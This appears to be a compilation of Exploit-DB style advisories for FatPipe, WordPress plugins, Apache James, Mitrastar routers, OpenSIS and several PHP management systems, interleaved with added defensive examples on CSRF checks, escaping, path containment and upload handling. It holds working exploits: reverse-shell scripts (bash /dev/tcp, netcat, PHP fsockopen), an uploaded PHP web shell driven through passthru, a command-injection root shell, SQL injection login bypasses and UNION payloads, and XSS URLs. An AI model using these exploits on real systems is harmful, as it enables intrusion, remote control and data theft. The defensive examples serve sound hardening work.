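The two server-side checks that the 'Add Admin' CSRF advisory (ZSL-2021-5681, the HTML form earlier on this page) and this privilege escalation advisory (ZSL-2021-5685) show missing on the same userSetRequest endpoint, modelled in one handler: an Origin plus per-session token check against cross-site form posts, and a rule that only an administrator may add users or change a privilege value. This is an added example, not FatPipe's code; the handler class, the origin value, the user table and the session ids are assumptions, the userList strings follow the shapes shown on the page.

```python
import hmac
import json
import secrets

USER, ADMINISTRATOR = 0, 1   # the two privilege groups named in the advisory


class UserSetHandler:
    """Model of a 'userSetRequest' handler with the two checks the advisories show missing.

    Constructed for this example; it is not FatPipe's code and ignores the password field."""

    def __init__(self, own_origin, users):
        self.own_origin = own_origin     # scheme://host the UI is served from
        self.users = dict(users)         # userName -> privilege
        self.tokens = {}                 # session id -> CSRF token handed to that session's pages

    def issue_csrf_token(self, session_id):
        token = secrets.token_urlsafe(32)
        self.tokens[session_id] = token
        return token

    def handle(self, session_id, caller, headers, form):
        """Return (status, message) for a POST to userServlet?loadType=set&block=userSetRequest."""
        # Check 1 (CSRF, ZSL-2021-5681): a form auto-submitted from another site carries the
        # victim's cookies but not our Origin, and it cannot read the per-session token.
        if headers.get("Origin") != self.own_origin:
            return 403, "cross-site request refused"
        expected = self.tokens.get(session_id)
        supplied = form.get("csrfToken", "")
        if expected is None or not hmac.compare_digest(supplied.encode(), expected.encode()):
            return 403, "missing or invalid CSRF token"

        # Check 2 (authorization, ZSL-2021-5685): privilege is decided by the caller's role held
        # on the server, never by the 'privilege' field the client sends.
        caller_priv = self.users.get(caller, USER)
        try:
            entries = json.loads(form.get("userList", "[]"))
        except ValueError:
            return 400, "malformed userList"
        for entry in entries:
            target = entry.get("oldUserName", entry.get("userName"))
            requested = int(entry.get("privilege", USER))
            if entry.get("action") == "add" and caller_priv != ADMINISTRATOR:
                return 403, "only administrators may add users"
            if caller_priv != ADMINISTRATOR and (
                target != caller or requested != self.users.get(target, USER)
            ):
                return 403, "users may only edit their own account and may not change privilege"
            self.users[entry["userName"]] = requested
        return 200, "ok"


# Constructed requests in the shapes shown on the page.
CSRF_ADD_ADMIN = '[{"userName":"adminz","privilege":"1","password":"TestPwd17","action":"add","state":false}]'
SELF_ESCALATE = '[{"userName":"bob","oldUserName":"bob","privilege":"1","password":"x","action":"edit","state":false}]'
PASSWORD_ONLY = '[{"userName":"bob","oldUserName":"bob","privilege":"0","password":"new","action":"edit","state":false}]'


def demo():
    """Cross-site add-admin form, self-escalation by a USER, and a legitimate self-edit."""
    h = UserSetHandler("https://10.0.0.7", {"admin": ADMINISTRATOR, "bob": USER})
    token = h.issue_csrf_token("sess-bob")
    r_csrf = h.handle("sess-bob", "bob", {"Origin": "https://evil.example"},
                      {"userList": CSRF_ADD_ADMIN})
    r_esc = h.handle("sess-bob", "bob", {"Origin": "https://10.0.0.7"},
                     {"csrfToken": token, "userList": SELF_ESCALATE})
    r_ok = h.handle("sess-bob", "bob", {"Origin": "https://10.0.0.7"},
                    {"csrfToken": token, "userList": PASSWORD_ONLY})
    return r_csrf[0], r_esc[0], r_ok[0], h.users["bob"]
```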
-
WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/contact-form-by-supsystic/
# Version: 1.7.14
# Tested on: Windows 10
# CVE: CVE-2021-24276

1. Description:
The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue.

2. Proof of Concept:
/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
-
WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/ultimate-maps-by-supsystic/
# Version: 1.2.4
# Tested on: Windows 10
# CVE: CVE-2021-24274

1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue.

2. Proof of Concept:
/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
-
WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/popup-by-supsystic/
# Version: 1.10.4
# Tested on: Windows 10
# CVE: CVE-2021-24275

1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue.

2. Proof of Concept:
/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
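The three Supsystic entries above share one defect: the tab parameter is written into an HTML attribute without attribute-context encoding, so the leading quote in the proof-of-concept closes the attribute and the rest becomes new attributes. This added example (not the plugins' code) decodes the Popup proof-of-concept URL, renders it the vulnerable way and the encoded way, and uses an HTML parser to show which attributes each rendering actually produces; the link markup and the set of known tab names are assumptions.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Tabs the settings page knows (assumed names; the plugins' real tab ids are not on the page).
KNOWN_TABS = ("main", "overview", "settings")


def tab_param(url):
    """Decoded page and tab parameters of a request URL ('+' becomes a space, as in the browser)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("page", [""])[0], qs.get("tab", [""])[0]


def render_tab_link_vulnerable(page, tab):
    """The advisories' bug: the raw tab value is written straight into an attribute."""
    return '<a href="admin.php?page=%s&tab=%s" class="nav-tab">%s</a>' % (page, tab, tab)


def render_tab_link_escaped(page, tab):
    """Attribute-context encoding: the embedded '"' becomes &quot; and cannot end the attribute."""
    return '<a href="admin.php?page=%s&amp;tab=%s" class="nav-tab">%s</a>' % (
        html.escape(page, quote=True), html.escape(tab, quote=True), html.escape(tab))


def select_tab(tab):
    """Stricter still: the tab is an enumerated value, so anything unknown maps to the default."""
    return tab if tab in KNOWN_TABS else KNOWN_TABS[0]


class _FirstTagAttrs(HTMLParser):
    """Collects the attribute names of the first element, the way a browser would tokenize it."""

    def __init__(self):
        super().__init__()
        self.names = None

    def handle_starttag(self, tag, attrs):
        if self.names is None:
            self.names = [name for name, _ in attrs]


def attribute_names(markup):
    p = _FirstTagAttrs()
    p.feed(markup)
    p.close()
    return p.names or []


# The proof-of-concept URL from the Popup advisory above.
POC_URL = ('/wp-admin/admin.php?page=popup-wp-supsystic'
           '&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//')
```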
-
Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)
# Exploit Title: Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)
# Date: 27/09/2021
# Exploit Author: shinris3n
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d

'''
This Python 3 implementation is based on the original (Python 2) exploit code developed by
Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec. The following modifications were made:

1 - Made required changes to print and socket commands for Python 3 compatibility.
2 - Changed the default payload to a basic bash reverse shell script and added a netcat option.
3 - Changed the command line syntax to allow user input of remote ip, local ip and listener port to correspond with #2.
4 - Added a payload that can be used for testing remote command execution and connectivity.
5 - Added payload and listener information output based on payload selection and user input.
6 - Added execution output clarifications and additional informational comments throughout the code.

@shinris3n
https://twitter.com/shinris3n
https://shinris3n.github.io/
'''

#!/usr/bin/python3
import socket
import sys
import time

# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'

if len(sys.argv) != 4:
    sys.stderr.write("[-]Usage: python3 %s <remote ip> <local ip> <local listener port>\n" % sys.argv[0])
    sys.stderr.write("[-]Example: python3 %s 172.16.1.66 172.16.1.139 443\n" % sys.argv[0])
    sys.stderr.write("[-]Note: The default payload is a basic bash reverse shell - check script for details and other options.\n")
    sys.exit(1)

remote_ip = sys.argv[1]
local_ip = sys.argv[2]
port = sys.argv[3]

# Select payload prior to running script - default is a reverse shell executed upon any user logging in (i.e. via SSH)
payload = '/bin/bash -i >& /dev/tcp/' + local_ip + '/' + port + ' 0>&1' # basic bash reverse shell exploit executes after user login
#payload = 'nc -e /bin/sh ' + local_ip + ' ' + port # basic netcat reverse shell
#payload = 'echo $USER && cat /etc/passwd && ping -c 4 ' + local_ip # test remote command execution capabilities and connectivity
#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # proof of concept exploit on root user login only

print ("[+]Payload Selected (see script for more options): ", payload)
if '/bin/bash' in payload:
    print ("[+]Example netcat listener syntax to use after successful execution: nc -lvnp", port)

def recv(s):
    s.recv(1024)
    time.sleep(0.2)

try:
    print ("[+]Connecting to James Remote Administration Tool...")
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((remote_ip,4555)) # Assumes James Remote Administration Tool is running on Port 4555, change if necessary.
    s.recv(1024)
    s.send((user + "\n").encode('utf-8'))
    s.recv(1024)
    s.send((pwd + "\n").encode('utf-8'))
    s.recv(1024)
    print ("[+]Creating user...")
    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n".encode('utf-8'))
    s.recv(1024)
    s.send("quit\n".encode('utf-8'))
    s.close()

    print ("[+]Connecting to James SMTP server...")
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((remote_ip,25)) # Assumes default SMTP port, change if necessary.
    s.send("ehlo [email protected]\r\n".encode('utf-8'))
    recv(s)
    print ("[+]Sending payload...")
    s.send("mail from: <'@team.pl>\r\n".encode('utf-8'))
    recv(s)
    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n".encode('utf-8')) if the recipient cannot be found
    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n".encode('utf-8'))
    recv(s)
    s.send("data\r\n".encode('utf-8'))
    recv(s)
    s.send("From: [email protected]\r\n".encode('utf-8'))
    s.send("\r\n".encode('utf-8'))
    s.send("'\n".encode('utf-8'))
    s.send((payload + "\n").encode('utf-8'))
    s.send("\r\n.\r\n".encode('utf-8'))
    recv(s)
    s.send("quit\r\n".encode('utf-8'))
    recv(s)
    s.close()
    print ("[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).")
    if '/bin/bash' in payload:
        print ("[+]Don't forget to start a listener on port", port, "before logging in!")
except:
    print ("Connection failed.")
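The root cause the script above relies on is a mailbox name that doubles as a relative path: 'adduser' accepts a name containing '../' and the SMTP recipient's local part is used the same way. This added example (not Apache James code) shows the two checks a mail store needs: a syntactic rule for names, and a resolved-path containment check as defence in depth. The base directory, function names and the RCPT parsing helper are assumptions.

```python
import re
from pathlib import Path

# Base directory under which the server keeps one mailbox directory per user (assumed path).
INBOX_BASE = "/srv/james/var/mail/inboxes"

# A mailbox name is a plain identifier: no slashes, no leading dot, bounded length.
USERNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def validate_username(name):
    """Syntactic check for 'adduser <name> <password>' and for the SMTP recipient local part."""
    return bool(USERNAME_RE.match(name)) and ".." not in name


def is_contained(base, name):
    """Defence in depth: resolve the would-be mailbox path and refuse anything outside base.

    This catches traversal even if the syntactic check were bypassed or forgotten."""
    base = Path(base).resolve()
    target = (base / name).resolve()
    return target != base and base in target.parents


def mailbox_dir(base, name):
    """Directory a message for 'name' may be written into, or ValueError."""
    if not validate_username(name):
        raise ValueError("invalid mailbox name")
    if not is_contained(base, name):
        raise ValueError("mailbox path escapes the repository")
    return Path(base).resolve() / name


def rcpt_localpart(rcpt_line):
    """Local part of an SMTP 'RCPT TO:<local@domain>' argument (assumed extraction rule)."""
    m = re.search(r"<([^>@]*)(?:@[^>]*)?>", rcpt_line)
    if m is None:
        raise ValueError("malformed RCPT TO")
    return m.group(1)


TRAVERSAL = "../../../../../../../../etc/bash_completion.d"   # the name used in the exploit above
```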
-
Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Title: Storage Unit Rental Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 28.09.2021
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage: https://www.sourcecodester.com/php/14932/storage-unit-rental-management-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14932&title=Storage+Unit+Rental+Management+System+using+PHP+Free+Source+Code
# Version: 1
# Tested on: Ubuntu

import requests
from bs4 import BeautifulSoup
import sys
import random
import string
import time

if len(sys.argv) != 4:
    print("[~] Usage : python3 exploit.py localhost ip port")
    exit()

site = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]

shellcode = "<?php $sock=fsockopen('" +ip+"',"+port+");exec('/bin/sh -i <&3 >&3 2>&3'); ?>"

letters = string.ascii_lowercase
name = ''.join(random.choice(letters) for i in range(5))

def LoginAndShellUpload():
    login = 'http://'+site+':80/storage/classes/Login.php?f=login'
    session = requests.session()
    post_data = {"username": "' OR 1=1-- -", "password": "aa"}
    user_login = session.post(login, data=post_data)
    cookie = session.cookies.get_dict()
    print('[+]Success login')
    print('[+]Try Shell upload')
    time.sleep(2)

    #shell upload
    url = 'http://'+site+':80/storage/classes/SystemSettings.php?f=update_settings'
    cookies = cookie
    headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0",
               "Accept": "*/*",
               "Accept-Language": "en-US,en;q=0.5",
               "Accept-Encoding": "gzip, deflate",
               "X-Requested-With": "XMLHttpRequest",
               "Content-Type": "multipart/form-data; boundary=---------------------------246884504016047375913085888751",
               "Origin": "http://localhost",
               "Connection": "close",
               "Referer": "http://localhost/storage/admin/?page=system_info",
               "Sec-Fetch-Dest": "empty",
               "Sec-Fetch-Mode": "cors",
               "Sec-Fetch-Site": "same-origin"}
    data = "-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nStorage Unit Rental Management System - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nSURMS - PHP\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------246884504016047375913085888751\r\nContent-Disposition: form-data; name=\"cover\"; filename=\""+name+".php\"\r\nContent-Type: application/x-php\r\n\r\n"+shellcode+"\n\n\r\n-----------------------------246884504016047375913085888751--\r\n"
    requests.post(url, headers=headers, cookies=cookies, data=data)
    print('[+]Success!')
    print('[+]Getting reverse shell')
    time.sleep(2)

def RCE():
    path = 'http://'+site+'/storage/uploads/'
    html_text = requests.get(path).text
    soup = BeautifulSoup(html_text, 'html.parser')
    for link in soup.find_all('a'):
        data = link.get('href')
        with open('shell_location.txt', 'w') as f:
            f.write(data)
    path2 = 'shell_location.txt'
    shell_file = open(path2,'r')
    shell = shell_file.readline()
    r = requests.get('http://'+site+'/storage/uploads/'+shell)
    print(r.text)
    print('[+]Hacked!')

LoginAndShellUpload()
RCE()
-
WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting
# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)
# Date: 2/3/2021
# Author: 0xB9
# Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip
# Version: 1.3.0
# Tested on: Windows 10
# CVE: CVE-2021-24286

1. Description:
This plugin redirects any 404 request to the parent URL.
The tab parameter in the Admin Panel is vulnerable to XSS.

2. Proof of Concept:
wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
-
WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)
# Exploit Title: WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)
# Date: 2/15/2021
# Author: 0xB9
# Software Link: https://downloads.wordpress.org/plugin/select-all-categories-and-taxonomies-change-checkbox-to-radio-buttons.1.3.1.zip
# Version: 1.3.1
# Tested on: Windows 10
# CVE: CVE-2021-24287

1. Description:
The tab parameter in the Admin Panel is vulnerable to XSS.

2. Proof of Concept:
wp-admin/options-general.php?page=moove-taxonomy-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
-
Mitrastar GPT-2541GNAC-N1 - Privilege escalation
# Exploit Title: Mitrastar GPT-2541GNAC-N1 - Privilege escalation
# Date: 10-08-2021
# Exploit Author: Leonardo Nicolas Servalli
# Vendor Homepage: www.mitrastar.com
# Platform: Mitrastar router devices GPT-2541GNAC-N1 (HGU)
# Tested on: Firmware BR_g3.5_100VNZ0b33
# Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-MitraStar/blob/main/README.md

Description:
----------
# Mitrastar GPT-2541GNAC-N1 devices provide SSH access into a restricted default shell (the credentials are printed on the back of the router, and in some cases these routers use default credentials).
# The command "deviceinfo show file <path>" is used from the reduced CLI to show files and directories. Because this command does not handle special characters correctly, it is possible to insert a second command as part of the <path> value. By using "&&/bin/bash" as the parameter value we can spawn a bash console, as seen in the following example:

Exploit:
--------
> deviceinfo show file &&/bin/bash  # This command will spawn a full interoperable bash console with root privileges.
-
OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)
# Exploit Title: OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)
# Date: 9/24/2021
# Exploit Author: Eric Salario
# Vendor Homepage: http://www.os4ed.com/
# Software Link: https://opensis.com/download
# Version: 8.0
# Tested on: Windows, Linux
# CVE : CVE-2021-40310

OpenSIS Community Edition version 8.0 is affected by a cross-site scripting (XSS) vulnerability in TakeAttendance.php via the cp_id_miss_attn parameter.

1. Login as "teacher".

2. Navigate to (take attendance):
http://demo.opensis.com/ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7%20onmouseover%3dalert(document.domain)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true

Decoded request:
GET /ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7 onmouseover=alert(document.domain) style=position:absolute;width:100%;height:100%;top:0;left:0; z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true HTTP/1.1

3. XSS triggers

PoC Video: https://www.youtube.com/watch?v=aPKPUDmmYpc
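The three reflected XSS entries above (the two WordPress plugins and OpenSIS) share one root cause: a query-string value is written back into an HTML attribute without escaping, so a quote in the value closes the attribute and the rest of it becomes a new attribute such as an event handler. The following is an added example written for this page, not code from any of those projects; the tab names, the page parameter and the function names are assumptions. It shows the vulnerable pattern beside a version that allow-lists the value and escapes each interpolation for its context.

```php
<?php
// Added example: reflected-parameter rendering, vulnerable and hardened forms.
// Nothing here is taken from the plugins or from OpenSIS; names are assumed.

// Vulnerable pattern: the raw request value is interpolated into an attribute
// and into element text. A value like
//   " style=animation-name:rotation onanimationstart="alert(1)
// closes the href attribute and injects an event handler.
function renderTabLinkVulnerable(string $tab): string
{
    return '<a class="nav-tab" href="?page=settings&tab=' . $tab . '">' . $tab . '</a>';
}

// Assumed set of valid tabs for this admin page; anything else is rejected.
const TABS = [
    'general'  => 'General',
    'advanced' => 'Advanced',
];

// Hardened pattern:
//  1. allow-list the value, falling back to a default instead of reflecting it;
//  2. URL-encode it inside the query string;
//  3. HTML-escape every interpolation (ENT_QUOTES so both quote styles are safe).
function renderTabLinkSafe(string $tab): string
{
    if (!isset(TABS[$tab])) {
        $tab = 'general';
    }
    $href  = '?page=settings&tab=' . rawurlencode($tab);
    $label = TABS[$tab];

    return '<a class="nav-tab" href="' . esc($href) . '">' . esc($label) . '</a>';
}

// Context-aware escaping helper for HTML text and attribute values.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Usage inside the page handler:
//   $tab = isset($_GET['tab']) ? (string) $_GET['tab'] : 'general';
//   echo renderTabLinkSafe($tab);
// With the payload from the advisories, the vulnerable function emits a live
// onanimationstart handler; the safe one emits the default "General" link.
```

In WordPress code the same idea is expressed with the core helpers: `sanitize_key()` or an explicit allow-list for the value, `esc_url()` for the href and `esc_attr()` / `esc_html()` for attributes and text.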
-
Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Title: Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 28.09.2021
# Author: Mr.Gedik
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html
# Version: 1.0
# https://asciinema.org/a/mjRFsUvshjGIcTsped1PAH8CB

Vulnerable code
controllers/add_petmanagement.php
Line 21 - move_uploaded_file($_FILES["images"]["tmp_name"], $_SERVER['DOCUMENT_ROOT']."/Petshop_Management_System/uploads/" . addslashes($_FILES["images"]["name"]));

Exploit
#############

<?php
/* @author:mrgedik */
function anim($msg, $time) {
    $msg = str_split($msg);
    foreach ($msg as $ms) {
        echo $ms;
        usleep($time);
    }
}

anim("__ __ _____ _ _ _ | \/ | / ____| | (_) | | \ / |_ __| | __ ___ __| |_| | __ | |\/| | '__| | |_ |/ _ \/ _` | | |/ / | | | | |_ | |__| | __/ (_| | | < |_| |_|_(_) \_____|\___|\__,_|_|_|\_\ ", 900);
echo PHP_EOL;

while(1) {
    echo anim("Target (http://example.com/path/): ", 800);
    $target = trim(fgets(STDIN));
    echo PHP_EOL;
    if (filter_var($target, FILTER_VALIDATE_URL) === FALSE) {
        echo "Not a valid URL".PHP_EOL;
    }else {
        break;
    }
}

@unlink("exp.php");
$fw = fopen("exp.php","a+");
fwrite($fw,'<?php $_POST[m]($_POST[g]); ?>');
fclose($fw);

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_URL, $target."/controllers/add_petmanagement.php");
$fields = [
    'images' => new \CurlFile("exp.php", 'image/png', 'exp.php')
];
curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);
$response = curl_exec($ch);
@unlink("exp.php");

if(strstr($response,"success")) {
    while(1) {
        echo anim("root@pwn: ", 800);
        $command = trim(fgets(STDIN));
        if($command == trim("exit")) {
            exit;
        }
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL,$target."/uploads/exp.php");
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS,"m=passthru&g=".trim($command));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        echo curl_exec($ch);
        curl_close ($ch);
    }
}else {
    echo anim("Fail", 800);
}
?>
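The quoted line from add_petmanagement.php, and the "cover" upload in the Storage Unit entry above, fail the same way: the client-supplied file name (including its .php extension) is trusted and the file is written into a directory the web server executes scripts from. The following is an added example written for this page, not code from either project; the upload directory, size limit and field name are assumptions. It places the vulnerable line beside an upload handler that sniffs the content, derives the extension from the detected type, generates its own file name and stores the file outside the document root.

```php
<?php
// Added example: the advisory's upload pattern beside a hardened handler.
// Not the project's code; paths and limits below are assumptions.

// Vulnerable pattern, as quoted in the advisory. addslashes() only escapes
// quotes; it does nothing about "exp.php" landing in a web-served directory:
//   move_uploaded_file($_FILES["images"]["tmp_name"],
//       $_SERVER['DOCUMENT_ROOT']."/Petshop_Management_System/uploads/" . addslashes($_FILES["images"]["name"]));

// Assumed storage location outside the document root, served later by a
// read-only download handler rather than directly by the web server.
const UPLOAD_DIR = '/var/lib/petshop/uploads';
const MAX_BYTES  = 2 * 1024 * 1024;

// Accepted image types; the extension comes from the detected type, never
// from the client's file name.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Store one uploaded image and return the server-chosen file name.
 * Throws RuntimeException on any validation failure.
 */
function storeImageUpload(array $file): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    // Only files that PHP itself received in this request are acceptable.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Sniff the bytes; neither the client Content-Type (image/png in the
    // exploit's CurlFile) nor the extension is trusted.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException('unsupported file type');
    }
    // A PHP script renamed to .png has no image header and fails here.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }

    // Random server-generated name: no traversal, no attacker-chosen extension.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = UPLOAD_DIR . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644); // readable, never executable
    return $name;
}

// Usage in the controller (form field "images", as in the advisory):
//   try {
//       $stored = storeImageUpload($_FILES['images']);
//       // persist $stored; serve it through a handler that sets an image Content-Type
//   } catch (RuntimeException $e) {
//       http_response_code(400);
//       echo json_encode(['status' => 'error']);
//   }
```

If the files must stay under the document root, the second line of defence is a web-server rule that disables script execution in the upload directory; the random file name also removes the directory-listing step the Storage Unit exploit relies on to find its upload.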
-
Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass
# Exploit Title: Cyber Cafe Management System Project (CCMS) 1.0 - SQL Injection Authentication Bypass
# Date: 29-09-2021
# Exploit Author: sudoninja
# Vendor Homepage: https://phpgurukul.com
# Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
# Version: 1.0
# Tested on: XAMPP / Windows 10

Steps-To-Reproduce:
Step 1 – Go to the product admin panel http://localhost/ccms/index.php.
Step 2 – Enter anything in username and password.
Step 3 – Click on Login and capture the request in Burp Suite.
Step 4 – Change the username to ' OR 1 -- - and the password to ccms.
Step 5 – Click forward and you will now be logged in as admin.

POC

POST /ccms/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Origin: http://localhost
Connection: close
Referer: http://localhost/ccms/
Cookie: PHPSESSID=agarg3okitkr3g8dbi5icnq8du
Upgrade-Insecure-Requests: 1

username='%20OR%201%20--%20-&password=ccms&login=
-
Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)
# Exploit Title: Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)
# Date: 28.09.2021
# Exploit Author: Murat
# Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip
# Version: 1.0
# Tested on: Windows 10

# Pharmacy Point of Sale System v1.0 SQLi

GET /pharmacy/view_product.php?id=-1 HTTP/1.1
Host: localhost
Cookie: PHPSESSID=5smfl8sfgemi1h9kdl2h3dsnd6
Sec-Ch-Ua: "Chromium";v="93", " Not;A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Connection: close

POC:
https://localhost/pharmacy/view_product.php?id=2000110022%27+union+select+1%2c1%2c1%2c1%2c%28select%27SqLi%27%7c%7csubstr%28%28select+sqlite%5fversion%28%29%7c%7c%27%04%27%7c%7c%27sqlite%5fmaster%27%7c%7c%27%04%27%7c%7c%27anonymous%27%7c%7c%27%01%03%03%07%27%29%2c1%2c65536%29%29%2c1%2c1%2c1--

-----------------------------------------------------------------------
# Other parameters with SQL injection vulnerability:

==> /pharmacy/?date_from=&date_to=1'"&page=sales_report
==> /pharmacy/?date_from=1'"&date_to=&page=sales_report
